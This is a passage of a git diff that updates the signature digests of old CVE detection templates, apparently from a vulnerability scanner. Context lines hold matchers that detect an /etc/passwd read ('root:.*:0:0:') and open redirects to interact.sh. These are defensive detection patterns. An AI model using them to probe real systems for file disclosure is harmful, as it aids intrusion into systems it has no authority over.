200 -# digest: 4a0a00473045022100fb4daa9c228b923a61c5e11388e2e42c7b6505fe615664172911ca0429dd5ff8022077c9aa14bb0dfd6d7e046e8bce05a14403d5f060388baa3c9df3ae42469cdb77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100912e1228880396cbbedb45de0a602506bea640e6cd8aaa621d0ec6707414e7c30220267eb7b0e7a3731120937298835fa180c09e4f109d5ef5a053292b64c87d6af7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index 1516da4d0f..832d03e02f 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205ae540f2d6cbc68c64570307fdf0bdf36a2b7acd80b4eee7f37e87fe1a215408022001a5e8067cb4740653e558dcafa619df1481f916f8dddb073b404630e6703a24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100880770c9a32ddd553b05d2f87d9b1b190a6c3a88dfa481015ce830ac8d7f2088022073a2283b069da137fa2a4d8f3b411949d3f0d45110008d393a0cf2862f3cb013:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index 428278c7bc..f9c097ff68 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c60015398304f9ce817dba9913fa3eea08043b9830cef5a4e1baeaadb99b5a0c022100d34a8d77d912dc1372e761e3ea0d4ccda3e9bcacddb4dd58752f9c53d81c8048:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bb9dc7da389c238f3d1f51bb8eb60df5e0b9eb7c3e2613a47e3d8535a0cd36050220650d1c196b18deeb192b1c50fdffed8b36fd4412bac34a17359e495325382166:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index ccaa6b1020..13e2bf3692 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202a6b3c7843f9b11700d264ebe9e7d62ab4a3218e9f4b692e8ebb15b025cb36a70221008873d32a32de8df6cd215ab066f2fb7847612833f7b326d8d4cc071bbc0a043a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210085ba6f15c447dffc76deb881a79fa4f92f8beb9255635e3a753f2cffcfc1dbbd022100d607c5f2aeba0c92069b3518cab335995771aa173ec4a1ed40c49cec8b43ec58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index 2130f00493..213d660b5b 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200fe7f64211b0ac14e48925d06d09a65070632e86c47843b9217a84320880330d022078feaff899b6d7e68e8cc85f5dbbc923969ec1a18c3259c0bcea48559cd82b1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022003fe39b5f5c4f14f5a4304fb88ee5233a61a6c4f8320e5ed5ed9cebf70ec20700220790cbb99fc446d59496ddf0e749f6c03fd0d0f9063d1d14442acabade84e4da0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 79568e3231..b1e76a79a3 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022060c84de88a71ccf8b996bea22ac6b62a2e003d9b3b8689c2d617d3e2f1ad99bc02202c59470b8795792f83ecbf5e7c7b37395db50a218f420b0fa76f2accc49d815f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210093d53a44e7670ae91340f32f011a1cf3d1a356b259d38839794f5af89b77d20802200ece4f4130a9a1e17e778ea393395611a46cc9af56a222985f4e148afc9159e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index 4f4712280f..bef38ec236 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022100ffdf11249d57dd33b3a45982e01655bacfcd643a4c57e97aa5f891243557c3b202205fd36fccfd2f9c9afdec7d8b8b4463ac9a1d07a52b558de7a68f374cbc5bc3ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b344e52e7ae31d77fb3af98c4d5022974a0aae7db6fa748c2ead62c71aa1f2ad0221009db6268e719957315f53a9c94d7d9bcce96fdca4bd6a7197b85d1bed428969a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index 986b065cd7..38d58ade0c 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -42,4 +42,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4b0a00483046022100b390e617f8d9be114aea50840c529aab08fac1822e4dece7746cb7733a409631022100b30c36b38ea49931b16615862de2267a59370daf662b7e77c88b25add453fb8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210086897c4a89ba3180b412adb9e2515a6dc81be03c34ce7b8c4f7059efc87adb38022075f0afa4057f34ad3b734c8a7d4fcd6fb8c7adf9ff68351baf948f2ecce764bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index 52f5de7570..24bc9aaba4 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220752ee73ce2196cc54c39a5e60377c58c87e7ef7ef489fd990d2b463b6ddd900402204885ac378662f0bf728920184aab940b6d54ebdb022e1767ebc9b7e4283d8ad1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100edfe0bfde8e2accddd711cbcb56d79be3056b26669bafe2f3b6cb9a91913a64002202d6da59dfba62472076866b6bd692f3639a1ffade4e7b4445cc2e3e12db22ebe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index acd906e9bd..a5a63a7618 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d034c615116d4e4388066b8ecd70006fb486a97f1893f14acdd83c4b1d48a2ec02200b87edb8aa8815371b589ebc0773ca1f591ef511e9f6dfb2c4a6bdc6cfc624f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bcb661005ec46d39a8b90cca079e6e94bcdfcd7cc10b0b4b21a007623a914cdc02200aedd6c2f81799c703ef979fe9ab6d86b014ea31fb9ae6c244b1688f3248ac39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index a1fcfebec4..7bc7dbdd0a 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210099e04590b72f5f59dff9760d627e7042601a45b16bea2c23852fa76186fae5ab0220361a0788e7674d6ed82b5e924aace4e3d604f237ac2666fa79b1e91830fd2e1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203366821ed2b22b2b05bab6a493a7c7c5db231fd6a6d80f9202908b447721a0b3022100dcfc043de885b54179a0e02dfbb7a4e986a33db1f9ef2f0cbd346b21ba783e65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index 3ba409999f..6f8dab2a39 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220011b812bacaed12772d45c7485d04136e35b9196b4c435b488601681c7bb3be50220722ab9dd33d98de09bfaec078bfd702692da5772714e412426ee37084ac9b862:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100868c8dad66aea364683d9a4e38139c1e040c1cb3b792e827191f2b16824d29ea0220642e61d2850862c9a2dc3795c395d80f33aa951bcfc657a88eec1aa9cf9a1c60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index f77378d2c4..e38cbd12d9 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bc8b6fb22e490512109118ecf32279b8742eb0391a184c91700c91da8b4591eb022100c82312184befa6261e4804c856191e828d49e06fd6f09184837202906a4f1d4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008ae69089dedcbf57111b3c504146d466dfe72254c0dd6fc4e377fe1d00b5ffec02200249cdd3548781a034d4e37670e19c65011269b24a6d1e24b2347a071823c5ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index a9b7cb0a0e..1968203952 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202c777774f99408aa53f9024ed173c4b5f653295367409e9b42c256336d3a3ad4022100ea93147fd00a0eba5c9c1ff6e8a48bba81f4df36c20ecf450a8a67a0b887c5cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100efe6e513aba3433f4ab0e1ef88eef287e7ee05c7abf8fb8ab86be22812dacaf002202412942f6b20de9136e4cd40ec9fcecc068f4830dc2e06810835f8d32346850a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index e7235dce6b..f60b8f63e8 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b7331565010d84c002b7cf2f7a86ffaad9ed7987a6af7ed386d0c1fdfc4a2870022100ad93d7312e808e09e1bafe8a62c52b228ef426c7d5a7dcce76a2d12acb50c0fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9c3e6842d7f2bd870dfaccb44cf7967e101052b3c7d1f03127000e7910fae26022100de227729def8c5184e4407e309b448a502c7ee7eb2d00d96cbd5ee0dd88a864d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index bbf1e2c67b..aedfce43ac 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100e3ee0cfc04525ca64e6f63073fa38f5db6ee44776907c68d8f5e190a19649a9a022100c21acec79450886ccc34a6c7737411102d641536ee3d33788522fb5fd5cf6f15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cb00fd3c4ce5a26ed6ab80d774267c399a5e2335eea586b3738ef156824058df022066feb85d7c51ff28bc5fbfaf7b0223531b5ec997f1dbcac45c0bdfefb62af202:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index df2d6fec55..2085401446 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201cc2638735aba64e480061e91a176acb1c5f885f26e50501697f8b444a66148b022075cccef4a1b6548b587c832158f624aa4192a98032f60e9f65fa9f9ec519b465:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b15ae99c1d3ca2f1233aaf0e788295b69ad7e6ae16c2b9fba81288856eb9a80d022100c80b87d9c65025ddf0900359653ba13d0908fe452d36752aa801ad1e761dcf47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index 502852583f..12954e5e22 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207ae0781d6298d63fef1e109c6941979f3a9cf2cf97cf52d54fbf5506d103256d02202ab0a38916296abc146346b756d193740490f3a762c1929bf019e92da272776c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022022201edc111a0f266f0cf4c0d27ad5fab474e474c3089690ad2ced0012bfaaa5022100e9a88bf679f5d29f8d752596eb8e02f41fc06863def5fadeea4f4aa13a50c2c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index e352e67234..1bd35cc90f 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202f4ff2ab58c70983fdbde0ee6860d7cb8229e81af51ace5e3e15533082c69a2d022072359ac609c3461da4901b3bb8ccaf83fcf42ccd7e480a74fec618aadba9dcfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200ffa1c79f56c51843e4ae33aade889343bc08e2cd48e34c96a18b426025d6fe8022100f0293ac85b2c273b5a96d641fd43b6aedb6c0408da0ddd0729d63ca2e87e81ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index 38dd989db7..6aaf2895d7 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022033efcff5dab3e96c4bd25ffd1f08b5d509129b21c1952b48f4c5f5bce1845b20022100dc3da12554c6710754770645dcafc258f15112fee5ae614da245894df5d37c91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dc0516314760341830b6d829ac3d71cca66d790eed97e8c05aecafcac46e6b47022100c7ad39fcf6a99cad4066323df1b8cea073d37e4621111901fca6e3879bac4fb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index 16f308ded0..c63bf2f5e1 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022049a324c195808d1ac76829b45e8f27b6cd31e1527fcbe5131d00a009b78b98b7022100e3e31759811d9e4b4f7781ef77c85f6e426853daf5f1d8eaf52e966c01f8a88e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f696085a166eff1a9f78532c3fe14ed4163e59d9a96908e4ec91a0ee7bed142102210087f7ea06c03263d733dbbe87ff98cd03fba93940a5c21b9f889f1e6440fdc566:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index 76737ccb6b..ff6e05ec42 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d3a39a822ed7fbffac4de0f1b0254ff4507f47002fe439be08c0983ec7a8613d022100958197a26e1b207a6910133f8e31baf385295e45ef9b589a8961292891f251c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440221008b9b59ffe3a50d64b3f18bb536f33fd35a3ab75c754ae5c347a93e5d240d4935021f796f07c35c8be0129aea12df6402810bd7a4197f0e7223ddc3a8488839c308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index dad40d4d75..0cc9627d7f 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022020268f779e361916bc07ce33e39192307f3bce053f3a189e088b1f836199e7ca02201a54a5155fcfc628c13a0d8282ac74dba004ed58582cdf30fad1985c90f82252:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220228cf9600a1dd63059d5e2ae690546f448bb168b4aac5013ee1511b66f279402022100c2aed62495d6728080edeb426772b88be9b02b07d3c183921755b2758ef70cbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index 2935467205..7ec6beb698 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008359d835a31bb6cdf1904ec4e2657c736624dfcfa5fcd01f3a02a8257d33048d02204b9552e1cb25efd557234b0af9313dd2f5474de89c5865b764178e1d4d38905e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207ff5ab30f4234618c6cb8ff8937b8c3f026fa22540c30e4723be09fd9a170bd7022018299b594c95012ccccd91e2464086eb0b75f168ba8b37e2befe9afb330da921:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index e1db833941..d95f88f4a9 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220548521f736459dae087d6a2bd94e3ae9773f5b831cff83356187c4188522b8f802201265d0b432dbacee031aaaf9bcbc72699612e5e25f881527cde284df0d35481c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b69a0ddb75fe5a6e5e5da5c2cffef27949528448bd76ee69133c23453fe51e5e022100f835ef8902e4b818d7e38d065ff2246d9bad77fd846cd678376cc369edc01934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index 44202e9809..909abd19f3 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205ee411e0df19bcb5be4939061e5b85f81c3ee3250e70223ecf19da638a332c6802207f1fbb956555429b3a2c32ad9d53e161530e3ebb76b3b8fafbc6483ff62c0d35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022057b70110c3230255acf102d97928955ea4da363451c17f6c961dc10b8888192e022100bbcfb911dd6c03f2fb6017baa145fe3fc559aff548f13cd010ead3675f18379a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index cfc44ddf1c..f23784557e 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c29bf12509751c6d4971b808635de57b7692d9e53df31d4b294649bb5ce456db022100bd518edc4ef976a87843b5cf5c4eec01353017a668000897cd0020a9fd09f094:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100faf98bf9bc8f8cb6dedd82ccb2b5cf49ddafd0119858f6e6d38c60ee7d0e8caa02210090d3d8e293050de920c56613510427d16875207dd02019d3185c7209dd3d46b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index c673d75218..dfa30448fc 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d20ace89e5fba9e38e12b29dcdf7f94465027da5466716242a9d9a23d933a1b202200ead3153d09e06b648a9c10ea73a58a9c85db18e8c136d6d177acdccb61f00fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220027648d4d4ad81d25673691592a865aeba4edbbc49bb98f22254932f7cdf8396022100ec67dfc163a844ed2d62e9bd3f63faf0afa4b51563dd5801c7926ddfe9caa690:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index 7e80d29d30..def3364414 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e2ee5113ea7ef6e40728910e3d42e905985b5b2f7ce07d14947241170a9a1dc9022029c4419ef7ee627daa6f2d32119c452f396ae07a75d68bf757f8b36f3d72279e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022015eb2f0633d1f1761aea73ac49a32a8c5f3f8d52eecf57edb76e58079036a216022047fcebd5259f4ddad0914d300ae4a4c5a374c3268897da3a734c54f4d85e3af7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index 5f0f38d9b7..f5d88de998 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022043fd12edb4a3a2a5476d0728b0371efefd549591b361970554bafd57766a5a7d0220319e614d046afdbc29519ddcf8c1b48b88a98655409e986e93b30e09366c7a41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220728d14721e7ffc97ae9101ec0a228589c6011874540942b1d947853989146acc022018abc77016af7a2f966797453910f502c217cd7ceee10b418b87b92ab3463193:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index ca5b99d766..7eb0ab1afe 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203e7b0577bb4c487c2041c049e54955ba57fcef21993bed3ee4a35397e5093009022012c708fe0fd04232b8a6542de8c0b947b5f72f266a2755b9ec230c1503415d79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207c61a8164fb31e72e6d98d6260e87eac00a5d414c127812939b6c3d4d5a65df3022100dc45b24eeb28c01993ffca9fec8ecfffa0f755494cb81ecfa6a918a770c9f9e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index d659098372..2bacf238d4 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bdd3f2bcbf92f7f9b377bef80acf174a216abb0cb2acf3477efe856c2083c07702203e9b25701cd0278ddb795ca72e40c2c00dcb6e3924b009706b93a3f0d6416eac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220724f85157044c11062097b6d4872436522fc35cb4dcf3b20b1f10d928f1d19e3022100adad2cda8f2a65281164fc4a29c8a5d4a93992b73827a47b74c5d1a3b0065733:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 9ccb1a4504..7761bd9783 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207a92c230e02820f5272be13d2ee12a3e2739ac81ac8868dfbbe2ff407522df0c0220517ba0c636efa561e00528f86bcb0cdb861bc0e5382c72f4cb8f11b5fffc3b89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dbfd8ea48c7ea963bf75e063f39dbb19633a7c111461cac4147532d71730a760022100831035f38425d12cc8628ada6e4deb423bc4abc0a38e3e8327de12cba5d4c203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index 055b6fd1e4..571332b9ac 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206c63f224a283f97a55ae4941e39f19ae06e9761cf123943f1b4d394ecef11ea9022100d2900835201e1b12398af58927fbaada9d98b609932bfc9f70d7c6263a16a705:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100844dd8dd2eae03a8b5ffcd18a6903d89b7f1036f0e18a48b7d7a33905d9778dd022100b46694882b7e3cd5476bbb1f4cf5c11665b30414e1bc6de9889ce5c403770fcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index a37a5e8a6a..7473a66a17 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ce9830af0a126d6aae7b0cbe9b7598011f30691e6f9066386c81c9fb4bf3c1bc022014f94fe6e238d285a780454bb05c33859277fe46440a3a38ce33dd5a9d376175:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220494054249b8e4d7f93dbc0217e276a6b901834b92d67035bfbf8823272a12584022100cf4b2371066ea4cbcb01dcec2a5462226e0745a71aa82ef45e1702a49ee05d68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index 566e691bbf..52679b2e54 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100caea4647de08403d53042f0568175efd2710e43a5d7e4962fcdb653206899ef802204d6c39e2e96c51b1626db9d90b0417e114debda8ef2844386f4faaa68630e512:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203bb985e9373625d3f78d831ec8f0ea16e5f05271a6a438f282ef535e526d2be9022100f8466a6d8c383a398c2c891afeefdcd309f332a76e51078dc142e1982b239bee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index d8919a69c7..b656913c78 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210092cb1f73ab7dcae152bc21fe109528bd68ddf3cb5c508c1c4ba81eb03a062e0f022100d32c234d25d1101db43416910efd4e3e67f536d43d1ed0a150d56605181bc34f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 